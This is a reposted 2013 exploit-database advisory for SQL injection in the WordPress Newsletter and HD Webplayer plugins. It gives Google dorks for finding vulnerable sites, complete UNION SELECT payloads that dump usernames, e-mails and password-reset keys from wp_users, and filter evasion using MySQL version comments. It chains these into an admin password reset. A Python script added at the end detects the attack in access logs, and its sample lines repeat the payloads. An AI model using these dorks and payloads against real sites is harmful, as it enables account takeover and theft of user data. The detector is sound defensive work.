infiltracion_wordprees_2013


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 Inj3ct0r / 1337day
 Exploit database separated by exploit type (local, remote, DoS, etc.)

 [+] Site : 1337day.com
 [+] Support e-mail : submit[at]1337day.com

 #########################################
 I'm DaOne, member of the Inj3ct0r Team
 #########################################
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

###########################################
# Exploit Title: WordPress plugin Newsletter SQL Injection Vulnerability
# Date: 2013-02-04
# Author: DaOne aka Mocking Bird
# Home: 1337day Inj3ct0r Exploit Database
# Software Link: http://www.satollo.net/plugins/newsletter
# Category: webapps/php
# Version: 3.x
# Google dork: inurl:wp-content/plugins/newsletter/do/subscribe.php
###########################################

-Exploit-

The id parameter of do/view.php is concatenated into the query unescaped. The SELECT has 21 columns and the page renders column 3, which is why the concat() sits in that position. 0x3c2d3e is the hex literal for "<->", used as a separator between the two fields.

http://{host}/wp-content/plugins/newsletter/do/view.php?id=99 {SQL}

Command 1 (user names and e-mail addresses):
union select 1,2,concat(user_login,0x3c2d3e,user_email),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from wp_users

Command 2 (password-reset keys; a key only exists after "Lost your password?" has been requested for that user, so trigger it first with the e-mail obtained in Command 1):
union select 1,2,concat(user_login,0x3c2d3e,user_activation_key),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from wp_users

Command 3 (use the leaked key to set a new password for the account):
wp-login.php?action=rp&key=KEY&login=admin

Note: Command 3 works only while WordPress stores the reset key in clear text in wp_users.user_activation_key, as the releases current at the time of this advisory did. WordPress 4.3 and later store only a salted hash of the key, prefixed with its creation time, so the value read through the injection cannot be submitted to action=rp directly.

================================================================================================
 SQL Injection: WordPress HD Webplayer Version 1.1
================================================================================================
 Dorks (Method 1)
===============================================================================================
# DORK 1
inurl:/wp-content/plugins/hd-webplayer/playlist.php?videoid=
# DORK 2
HD_Webplayer_Commercial_Key logo.jpg topleft 50 http
===============================================================================================
 Dorks (Method 2)
===============================================================================================
# Dork 1 (config.php)
inurl:"/wp-content/plugins/hd-webplayer/config.php?id="
# Dork 2 (playlist.php)
inurl:"/wp-content/plugins/hd-webplayer/playlist.php?videoid="
# Dork 3 (general):
inurl:"/wp-content/plugins/hd-webplayer/"
===============================================================================================
 METHOD 1
===============================================================================================
The videoid parameter of playlist.php is injectable; the query has 11 columns. The /*!UNION*/ and /*!SELECT*/ forms are MySQL version comments, which the server executes as plain UNION SELECT while naive keyword filters miss them. 0x3a is ":" and 0x3b is ";" (field and record separators inside group_concat()).

1 : playlist.php?videoid=2+/*!UNION*/+/*!SELECT*/+group_concat(ID,0x3a,user_login,0x3a,user_email,0x3b),2,3,4,5,6,7,8,9,10,11+from+wp_users
    (append this after the "hd-webplayer" path from Dork 1)
===============================================================================================
2 : /*!UNION*/+/*!SELECT*/group_concat(ID,0x3a,user_login,0x3a,user_activation_key,0x3b),2,3,4,5,6,7,8,9,10,11 from wp_users
    (this retrieves the activation key: first open the admin login panel, click LOST PASSWORD and enter the e-mail obtained in step 1, then place this payload in the URL starting at the "+" that follows videoid=2)
===============================================================================================
3 : wp-login.php?action=rp&key=KEY&login=admin
    (combine the KEY and the user obtained above)
===============================================================================================
 METHOD 2
===============================================================================================
Same injection point, written without the comment evasion. The negative videoid (-3) selects no real row, so only the UNION row is rendered; here the page displays column 4.

1 : http://www. website .com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3 UNION SELECT 1,2,3,group_concat(user_login,0x3a,user_email,0x3b),5,6,7,8,9,10,11 FROM wp_users--
===============================================================================================
2 : http://www. website .com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3 UNION SELECT 1,2,3,group_concat(user_login,0x3a,user_activation_key,0x3b),5,6,7,8,9,10,11 FROM wp_users--
===============================================================================================
3 : wp-login.php?action=rp&key=KEY&login=admin
===============================================================================================
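The following is an added detection example, not code from the original advisory or from either plugin. It scans web-server access logs for the two-stage attack described above: a UNION-based injection against the endpoints and parameters named in the advisory (undoing the URL encoding and the /*!UNION*/ version-comment evasion before matching), and a follow-on wp-login.php?action=rp request from the same source after user_activation_key was read. The endpoint paths and parameter names are taken from the advisory; the combined log format is assumed, and the log lines are constructed for illustration.

```python
"""Detect the UNION-based SQL injection and follow-on password-reset traffic
from the advisory above in web-server access logs.

Added example; not code from the advisory or from the plugins. Endpoint paths
and parameter names come from the advisory, the combined log format is an
assumption, and SAMPLE_LOG is constructed traffic, not a real capture.
"""
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Injectable endpoint -> injectable parameter, as named in the advisory.
SINKS = {
    "/wp-content/plugins/newsletter/do/view.php": "id",
    "/wp-content/plugins/hd-webplayer/playlist.php": "videoid",
}

# Constructed sample lines in Apache/nginx combined format (not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [04/Feb/2013:10:15:02 +0000] "GET /wp-content/plugins/newsletter/do/view.php?id=99+union+select+1,2,concat(user_login,0x3c2d3e,user_email),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+wp_users HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.7 - - [04/Feb/2013:10:16:40 +0000] "GET /wp-content/plugins/hd-webplayer/playlist.php?videoid=2+/*!UNION*/+/*!SELECT*/+group_concat(ID,0x3a,user_login,0x3a,user_activation_key,0x3b),2,3,4,5,6,7,8,9,10,11+from+wp_users HTTP/1.1" 200 812 "-" "Mozilla/5.0"
203.0.113.7 - - [04/Feb/2013:10:17:05 +0000] "GET /wp-login.php?action=rp&key=abc123&login=admin HTTP/1.1" 302 0 "-" "Mozilla/5.0"
198.51.100.4 - - [04/Feb/2013:10:20:11 +0000] "GET /wp-content/plugins/hd-webplayer/playlist.php?videoid=7 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
198.51.100.4 - - [04/Feb/2013:10:21:30 +0000] "GET /wp-login.php?action=rp&key=def456&login=editor HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
UNION_RE = re.compile(r"\bunion\s+(all\s+)?select\b")


def normalize(value: str) -> str:
    """Undo the evasions used in the advisory's payloads before matching:
    URL encoding and '+' for space (decoded again to catch double encoding),
    MySQL version comments (/*!UNION*/ or /*!50000UNION*/ -> UNION) and
    ordinary /**/ comments used as whitespace; then fold case and spacing."""
    s = unquote_plus(value)
    s = re.sub(r"/\*!\d*\s*(.*?)\*/", r"\1", s)
    s = re.sub(r"/\*.*?\*/", " ", s)
    return " ".join(s.split()).lower()


def decode_hex_literals(sql: str) -> str:
    """Render MySQL hex literals as text (0x3c2d3e -> '<->', 0x3a -> ':')
    so the analyst sees the separators the attacker chose."""
    return re.sub(
        r"0x((?:[0-9a-f]{2})+)",
        lambda m: "'" + bytes.fromhex(m.group(1)).decode("latin-1") + "'",
        sql,
    )


def scan(log_text: str) -> list:
    """Return one finding per suspicious request, in log order.

    Stages: 'sqli' (UNION injection into a listed sink), 'sqli-reset-key'
    (same, but reading user_activation_key) and 'reset-with-leaked-key'
    (wp-login.php?action=rp from an IP that previously read reset keys)."""
    findings = []
    leaked_key_sources = set()
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, ts, target = m["ip"], m["ts"], m["target"]
        parts = urlsplit(target)
        params = parse_qs(parts.query, keep_blank_values=True)
        if parts.path in SINKS:
            # Join repeated parameters so parameter pollution cannot split a payload.
            sql = normalize(" ".join(params.get(SINKS[parts.path], [])))
            if UNION_RE.search(sql):
                reads_keys = "user_activation_key" in sql
                if reads_keys:
                    leaked_key_sources.add(ip)
                findings.append({
                    "ip": ip, "time": ts, "path": parts.path,
                    "stage": "sqli-reset-key" if reads_keys else "sqli",
                    "payload": decode_hex_literals(sql),
                })
        elif (parts.path == "/wp-login.php" and params.get("action") == ["rp"]
              and "key" in params and ip in leaked_key_sources):
            findings.append({
                "ip": ip, "time": ts, "path": parts.path,
                "stage": "reset-with-leaked-key",
                "login": " ".join(params.get("login", [])),
            })
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["time"], f["ip"], f["stage"], f.get("payload", f.get("login")))
```

The reset-stage correlation is deliberately keyed on the source IP having already read user_activation_key; a lone wp-login.php?action=rp request is normal user behaviour and is not flagged (the 198.51.100.4 lines above produce nothing). Extend SINKS with any further plugin endpoints your site exposes.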